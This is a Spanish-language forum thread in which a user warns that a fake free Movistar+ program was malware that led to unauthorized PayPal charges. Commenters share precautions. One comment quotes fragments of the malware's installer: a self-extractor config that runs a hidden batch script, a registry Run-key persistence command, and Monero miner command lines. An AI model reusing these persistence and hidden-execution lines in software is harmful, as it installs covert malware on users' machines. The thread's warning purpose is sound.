pedroski
"De momento paro todas mis subidas por todas las denuncias recibidas."

¡¡Cuidado!! Leer por favor!

• Categoría: Off-Topic
  • Publicado hace más de 5 meses
Buenas, me salgo de lo que suelen se mis publicaciones aqui en Identi, por una cosa que me ha pasado. 
Un usuario ha posteado aqui un programa supuestamente para ver los canales de Movistar+ a traves del ordenador, completamente gratis. Quizas he pecado de iluso, no lo niego, pero al ser una web de aportes "fuera de lo legal" pues he decidido probar suerte.

El caso es que yo suelo andar sin antivirus siempre, ya que con tanto juego que subo, con tantos cracks, suele dar problemas ya que los antivirus suelen eliminar los cracks automaticamente.

Escribo este post, para advertir, que si algun otro usuario picó como yo en ese "programa" que observe su cuenta de Paypal. Me han llegado 3 recibos a paypal:

-Uno de 340€ a nombre de Abdell Mara [email protected]
-Uno de 13.95$ a nombre de Daniel Sosa [email protected]
-Uno de 90€ a nombre de Virtual World Services GmbH virwox [email protected]

Supongo que el desgraciado que ha hecho esto es Daniel Sosa, cuyo prenda ya esta denunciado, por supuesto.

Si veis algun tramite no autorizado del estilo al mio, lo mejor es cambiar clave, cambiar pin y cambiar preguntas de seguridad. Y automaticamente llamar a Paypal, para que sean ellos los que creen la denuncia por fraude.

Si alguien mas ha estado en mi misma situacion, que lo escriba en los comentarios, y en cualquier cosa que os pueda ayudar, no dudeis en hablar conmigo.
descargar peliculas - descargar programas
16 Puntos Score: 2/10
Visitas: 2431 Favoritos: 1
Ver los usuarios que votaron...
50 Comentarios ¡¡Cuidado!! Leer por favor!
Esto es lo que pasa por dejar a los novatos hacer post ......

yo en particular me estoy  replanteando seguir en Identi me hackearon mi cuenta unas cuantas veces . espero que tomen nota los que mandan administradores ..   gracias por la información  saludos  
No entiendo bien cual es tu problema, no sé, ¿pide crear una contraseña ese programa movistar+?. En el caso de pedir contraseña ¿usas la misma para todo? Te recomiendo crear contraseñas distintas para todo y guardarlo en un .txt, ya sé que es un coñazo pero es muy seguro .
Espero que la denuncia sea efectiva y tengan su merecido.
@antuan6211 No, no es la misma contraseña. El problema ha sido que el .exe del programa que subio el desgraciado este, venia infectado con un virus. Pero como no tenia antvirus, se ha colado en mi Pc hasta que me he dado cuenta.
Cita pedroski: Mostrar
Ah, ok, bueno en ese caso es un riesgo que se corre. Ante eso suelo correrlo en virtual+antivirus para asegurarme.
a mi me paso algo similar exactamente con el mismo programa y extrañamente me saltaron un par de compras online una es de un celular, y lo estoy pagando hasta que se resuelva ya hice la denuncia la verdad se la re mandaron, ahora tengo miedo cada ves que descargo algo. no queria contarlo pero viendo esto es algo malo, yo soy humilde y casi sin dinero y que te pasen estas cosas es horrible......... tuve muchos problemas la pase mal muy mal
hola amigo yo soy novato,  esa situacion a la que te refieres,  no afecta a los usuarios que solamente descargan ?..... discupen si es estupida mi pregunta ... gracias
@hospy723 Hombre... Es que a mi me han quitado casi 500€... Que es medio suelo de un mes...

Por suerte, ya me han devuelto el cargo de los 90€. Ya solo quedan los otros 2
jaja obviamente era un virus, porque en el rar solo habia un exe ademas no existe un metodo facil o gratis  
@SpyMetal Si, si tu no has descargado nada de lo que he dicho, no tienes problema
@fortinox No, en el rar habia mucho mas que un EXE. Habia carpetas con dll, configuraciones, canales, y demas... Estaba muy trabajado
Yo no descargo nada de post que tengan los comentarios cerrados y denuncio esos post, nose si este es el caso.
gracias pedroski , creo que no , pero voy a estar atento a lo que descargo ... saludos ... un abrazo
 a mi me han hecho una compra por un valor de 800 euros para que te des una idea comprando un celular sony z5
desgraciadamente las mismas compañias hacen que los defraudadores tengan las armas para robar impunemente.
hace unos años me compre una consola xbox 360 y como casi no se jugaba decidi venderla y no tube la precaucion de desactivar xbox live. pues cada mes me estuvieron cobrando, hable a microsoft y al banco y en el banco me decian que si era una compañia de fuera que no se podiia, trate por todos los medios de cancelarla y nunca se pudo. un dia se me extravio m i cartera y reporte mi tarjeta de credito extraviada y pense al darme una nueva es nuevo numero de tarjeta y adios los cargos y me llego la tarjeta nueva y un aviso que decia. para ahorrarte los tramites te agregamos automaticamente todos los cargos a tu nueva tarjeta. jajaja     para no hacerla larga 3 años pague xbox live, creo que hasta que la persona que lo jugaba, habra dicho pobre ya lo jodi mucho y se cancelo.
¿Cómo es posible que un virus te "robe" dinero de tus cuentas bancarias? Eso simplemente lo hablas con el banco y le indicas que NO RECONOCES LA COMPRA y listo. Mientras no tengan tu firma o autorización no deberían hacerles ningun tipo de cargo bancario. Supongo que tuvieron que ingresar sus datos personales o ¿cómo??  
que mal amigo!  
itzernest  , creo que estas en un error. ahora no se necesita la firma y la autorizacion para comprar con tarjetas de credito en linea. cualquiera puede comprar con una tarjeta sin problemas.  yo siempre he comprado y pagado en linea y nunca piden mi firma o autorizacion.
@itzernest El tio ha estado dentro de mi pc. Me he dado cuenta, porque al reiniciar el ordenador, me decia windows, que si queria cerrar la "otra" sesion abierta. Y yo no tengo varias sesiones, asi que ahi he sospechado, y ha sido cuando me he dado cuenta de los cargos. Y por eso he perdido todos mis juegos, porque no me la he querido jugar mas, y he formateado directamente...
@pedroski amigo gracias por este aviso!!! Lamento lo sucedido, pero deveras que estos tipos solo quiieren perjudicar por placer a los demas.... pero animo y con ciudado e igual tomare esas precaucion por mas que parescan bien pintadas... Saludos mi gran amigo y espero se solcuiones esta caso Bendiciones!!!
@oajt7 Muchas gracias compañero. Yo tambien espero poder solucionar todo esto... Ya sabeis... intentar no descargar nada de los novatos...
Pero solucionar este tipo de problemas es muy facil, no se porque los amigos de identi no lo han hecho, mejor dicho los administradores, la idea es que los novatos si puedan postear, pero con la condicion de que no puedan postear programas ni archivos comprimidos, como zip, rar, etc, que son los candidatos mas probables a virus y programas fraudulentos, esa es la mejor solucion, si no la cumplen, simplemente se les banea y ya....
Amigo entiendo tu situación aunque no me haya pasado siempre tomo mis precauciones y siempre ejecuto pruebo mis descargas en una maquina virtual de la que guardo una copia en un disco externo por si se infecta la que se esta ejecutando no tengo que volver a instalar sino borrar y reemplazar, ahora bien si tu cuenta de Paypal esta asociada a una tarjeta de debito o credito y paypal no acepta el reclamo ve al banco emisor de tu tarjeta y haz el reclamo con ellos, esto es mas rápido, y por ultimo nunca asocies tu numero de cuenta bancaria, utiliza siempre unicamente la tarjeta, Saludos y suerte con tus reclamos.
@Megatrondx Lo de solo asociar la tarjeta no lo sabia. Gracias por el consejo!!
Gracias por la info pedroski, esta es la esencia de páginas como esta, estar atento a los compañeros y ayudar en lo que se pueda, suerte con eso. y seguir prestando atención a posts "extraños"
grave eso ! debió ser un troyano sin duda
Amigo @pedroski hace vario tiempo este jodido usuario a estado posteando este software movistar y otros y ya se habia advertido hace un tiempo y es bien conocido porque casi siempre tiene los comentarios cerrados,sinembargp se puede esperar un cambio en la modalidad de operar de este arremedo de hacker,y me solidariso contigo porque se que es duro perder juegos pesados y demas,espero que puedas recuperarte de este problema y como comentario final,traten de no descargar software de usuarios con pocos puntos y rango o que no se han muy conocidos,traten de analizar los archivos antes con virustotal y solo descarguen software realmente necesario,recuerden ante todo que el mejor antivirus es uno mismo,saludos
Compañero lamento mucho lo que te a pasado llevo como 15 dias denunciando todo ese tipo de post con comentarios cerrados de varios usuarios (unos nuevos y otros no)tambien habra robado las cuentas de ellos (y quien sabe si mas) que tengas suerte en recuperar el dinero y no seas tan confiado con esos aportes y si no quieres instalar antivirus por lo menos pasalos por virustotal,saludos
Yo he denunciado a muchos que postean programas con comentarios cerrados. Les cierran la cuenta, pero se abren otra nueva y siguen. Lo mejor es no descargarles nada. Es obvio que si no permiten escribir comentarios será porque hay virus en sus programas. La solución? eliminar la opción de comentarios cerrados, porque no sirve para nada.
De hecho llevo rato siguiéndole la pista
De hecho manda ejecutar un Script por lotes
aquí están sus cuentas y el script:

[Options]
DefaultDir=TEMP
PromptDir=0
RunBefore=MovistarPlus.exe
Run=setsetp.EXE
ExtractAll=1
DoneBox=1
Title=
Caption=Press OK to continue.
OK=OK
Cancel=Cancel

//set objshell = createobject("wscript.shell")//
//objshell.run "Start.bat",vbhide//

//REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v networking /t REG_SZ /d "C:\Windat\Crsx.exe"//

//networking.exe -user [email protected] -xmr 1//
//netlogin.exe -user [email protected] -xmr 1//
Si navegas con Google Chrome seguramente te hayan robado todas las contraseñas que usas, porque el navegador te pregunta y te las va guardando. Lo que tienes que hacer es decirle a Chrome cuando te pregunte si quieres que te guarde una contraseña , click en NO. Y si quieres borrar alguna contraseña guardada, por ejemplo la de PayPal vete a su página para introducir la contraseña y aparecerá un dibujo de una llave en la parte derecha de la barra de búsqueda del explorador (arriba a la derecha), le haces click y le das a administrar contraseñas y para borrar una, solo tienes que dar a la "x" que aparecerá cuando pases el cursor y listo. Lo que pasa es que cada vez que quieras entrar con la contraseña tendrás que introducirla manualmente, pero evitarás que te la vuelvan a robar.  
A mi me paso algo parecido con otro programa, el que hizo el post decía, des-habilitar el antivirus porque da falsos positivos, y segui "sus insttrucciones" y me instalo el microsoft client, habilito puerta de entrada a mi maquina y quien sabe que mas, lo bueno es que no deshabilite el antivirus que viene con el Windows y este me detecto el script instalado y lo bloqueo, tuve que escanear la maquina con 3 antivirus, y antiespias, en fin que tarde como una semana para limpiarla. Lo bueno es que no llego a entrar a mi computadora el hacker, gracias al antivirus que trae windows. Espero que se resuelva favorablemente tu problema.
Lamento lo que te sucedio amigo pedroski, estoy contigo y me duele que a una persona como tu que tanto aporta a este sitio le sucedan cosas asi. recibe un abrazo. tu amigo cnava
Wao!! que cosas ! gracias por la informacion!
Muchas gracias a todos! Veremos a ver en que acaba lo del dinero
Animo Pedroski
Y gracias por avisar
Te dejo mis 10 puntos de hoy, no son mucho pero quiero apoyarte de alguna manera, amigo.
Sólo me dejó agregar dos puntos, que mala pata
@suspiria70 No te preocupes. Este post no lo hice para puntos, si no para avisaros a todos, de que tengais cuidado de quien descargais! aun asi, muchas gracias!
Pues si! Pecaste de iluso, los post con comentarios cerrados los denuncio apenas entro por que ese es el metodo que usan y tener un equipo conectado a internet sín antiviruz  
@Tortuga3 Toda la vida llevo sin antivirus, y nunca paso nada. Esta vez he tenido un error, pero es el primero.
@pedroski ombe compañero que vaina, pero tu post sirve para ilustrar a mucha gente que en ocasiones es muy confiada, te mando mucho animo y espero que te recuperes pronto de ese percance.
Gracias pedroski lo siento mucho.......ojala logres recupar lo perdido.....
Y justo que empezabas a usar MEGA nuevamente pedroski   ,creo que no cerré bien la puerta al salir la ultima vez   es una broma amigo,identi no debería permitir la opción del que el usuario no permite cometarios,desde mi ignorancia no solucionara un firewall bueno y que te pregunte si desas instalar ciertas cosas en el equipo de modo a ver que instalas,no recuerdo el nombre pero tenia un firewall con un muñequito de un policía avisándome cada cosa que instalaría,era un rompe bolas pero era bueno,por cierto vuelvo a activar el kasèrsky por los pollos aunque ni tengo cuenta para comprar online,suerte amigo y espero que soluciones pronto así compartis los juegos que tenes
pedrin no bajes nada cuando en el post estan cerrados los comentarios
@MetaWacha Desde luego, que ya he aprendido. Por suerte todo se ha resuelto a mi favor, y me han devuelto todo el dinero. Bendito paypal (L) jajaja
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!
Facebook Identi